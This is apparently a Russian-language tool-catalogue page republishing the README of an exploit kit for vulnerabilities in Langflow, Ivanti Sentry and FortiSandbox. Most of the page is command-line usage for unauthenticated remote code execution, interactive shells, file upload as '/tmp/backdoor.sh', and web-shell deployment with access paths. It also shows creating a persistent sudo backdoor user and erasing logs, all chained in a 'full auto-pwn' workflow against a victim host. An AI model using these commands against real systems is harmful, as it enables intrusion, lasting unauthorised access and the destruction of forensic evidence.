Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-5027-Langflow | Kitploit
Инструменты/GitHubGitHub/layer-6/cve-2026-5027-langflow
Повышение привилегийМеханизмы персистентностиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияТестирование на ПроникновениеКомандование и УправлениеRed TeamingИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
2 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
layer-6/cve-2026-5027-langflow

CVE-2026-5027-Langflow

Репозиторий

Эксплоит для (CVE-2026-5027), (CVE-2026-10520) и (CVE-2026-25089):

Clone

root@kitploit:~
git clone https://github.com/Layer-6/CVE-2026-5027-Langflow.git
cd CVE-2026-5027-Langflow

Использование (файл exploit.py)

Автоматическое тестирование и эксплуатация.

root@kitploit:~
python3 exploit.py -u https://target.com

Пользовательские настройки CLI

Используйте свой собственный веб-шелл, когда шелл находится внутри папки:

root@kitploit:~
python3 exploit.py -u https://target.com --shell 

(📁shells/my-shell.php)

Когда шелл находится в папке инструмента или в текущей директории (без вложенной папки):

root@kitploit:~
python3 exploit.py -u https://target.com --shell my-shell.php

Ваш веб-шелл может быть (PHP, Python (CGI), Perl, Ruby, ASPX).

Вы можете задать таймаут с помощью --t и загрузить/использовать payload или пользовательский путь из папок и файлов с помощью --p:

root@kitploit:~
python3 exploit.py -u https://target.com | -t 58 | |-p payloads.txt | | --upload-paths Dirs.txt |

Пример:

root@kitploit:~
python3 exploit.py -u https://target.com --shell shells/myshell.php -t 58 -p payloads.txt --upload-paths dirs.txt

Использование (файл exploitt.py)

Предназначен для следующих CVE:

· CVE-2026-10520 (CVSS 10.0)

· CVE-2026-25089 (CVSS 9.1)

Удалённое выполнение кода без аутентификации

Учетные данные не требуются.

📖 Использование

Быстрый старт - интерактивное меню (без аргументов)

root@kitploit:~
python3 exploitt.py

Затем следуйте подсказкам:

1. Выберите тип цели (Ivanti или Forti)

  1. Введите URL цели (например, https://192.168.1.100:8443)
  2. Задайте таймаут, прокси, режим отладки
  3. Выберите действие (команда, шелл, веб-шелл и т. д.)

Командная строка (продвинутый режим)

1. Ivanti Sentry (CVE-2026-10520)

root@kitploit:~
# Check if vulnerable
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -c "id"

# Interactive shell
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -s

# Deploy JSP webshell (Tomcat)
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -w

# Create backdoor user + clean logs
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -p --clean

2. FortiSandbox (CVE-2026-25089)

root@kitploit:~
# Single command
python3 exploitt.py -u https://forti.example.com --type forti -c "whoami"

# Interactive shell with file upload
python3 exploitt.py -u https://forti.example.com --type forti -s
# Inside shell: upload /path/local.txt /remote/path.txt

# Deploy PHP webshell
python3 exploitt.py -u https://forti.example.com --type forti -w

# Full auto‑pwn (check, shell, webshell, persist, clean)
python3 exploitt.py -u https://forti.example.com --type forti -s -w -p --clean

3. Автоопределение (скрипт угадывает службу)

root@kitploit:~
python3 exploitt.py -u https://target.example.com -c "id"

4. Использование прокси и отладки

root@kitploit:~
python3 exploitt.py -u https://target:8443 --proxy http://127.0.0.1:8080 --debug -c "uname -a"

Доступные аргументы командной строки

Команды интерактивного шелла

Внутри интерактивного шелла вы можете использовать:

КомандаПримерОписание
обычная командаidВыполнить любую системную команду
uploadupload exploit.sh /tmp/backdoor.shЗагрузить локальный файл на удалённый хост
exitexitВыйти из шелла

Детали развёртывания веб-шелла

· Ivanti Sentry – развёртывает .jsp шелл внутри Tomcat webapps (/usr/local/tomcat/webapps/ROOT/) · Доступ через https://target/shell_random.jsp?cmd=whoami · FortiSandbox – развёртывает .php шелл в веб-корне (/var/www/html/) · Доступ через https://target/shell_random.php?cmd=whoami

Пример рабочего процесса (полное тестирование на проникновение)

root@kitploit:~
# 1. Detect and exploit
python3 exploitt.py -u https://victim.com:8443 --type ivanti -s

# 2. Inside the shell, check privileges
id

# 3. Deploy webshell for persistence
python3 exploitt.py -u https://victim.com:8443 --type ivanti -w

# 4. Create a backdoor user
python3 exploitt.py -u https://victim.com:8443 --type ivanti -p

# 5. Clean logs
python3 exploitt.py -u https://victim.com:8443 --type ivanti --clean

От Telegram-канала Red:

https://t.me/Red_Rooted_Ghost

Скачать инструмент
АргументОписание
-u, --urlЦелевой URL (например, https://192.168.1.100:8443)
--typeПринудительно задать службу: ivanti или forti (необязательно, автоопределение)
-t, --timeoutТаймаут запроса в секундах (по умолчанию 30)
--proxyHTTP/HTTPS прокси (например, http://127.0.0.1:8080)
-d, --debugВключить вывод отладочной информации
--uaПользовательская строка User-Agent
-c, --cmdВыполнить одну команду и выйти
-s, --shellЗапустить интерактивный шелл
-w, --webshellРазвернуть веб-шелл (PHP для Forti, JSP для Ivanti)
-p, --persistСоздать постоянного пользователя-бэкдор с правами sudo
--cleanСтереть логи и историю команд после эксплуатации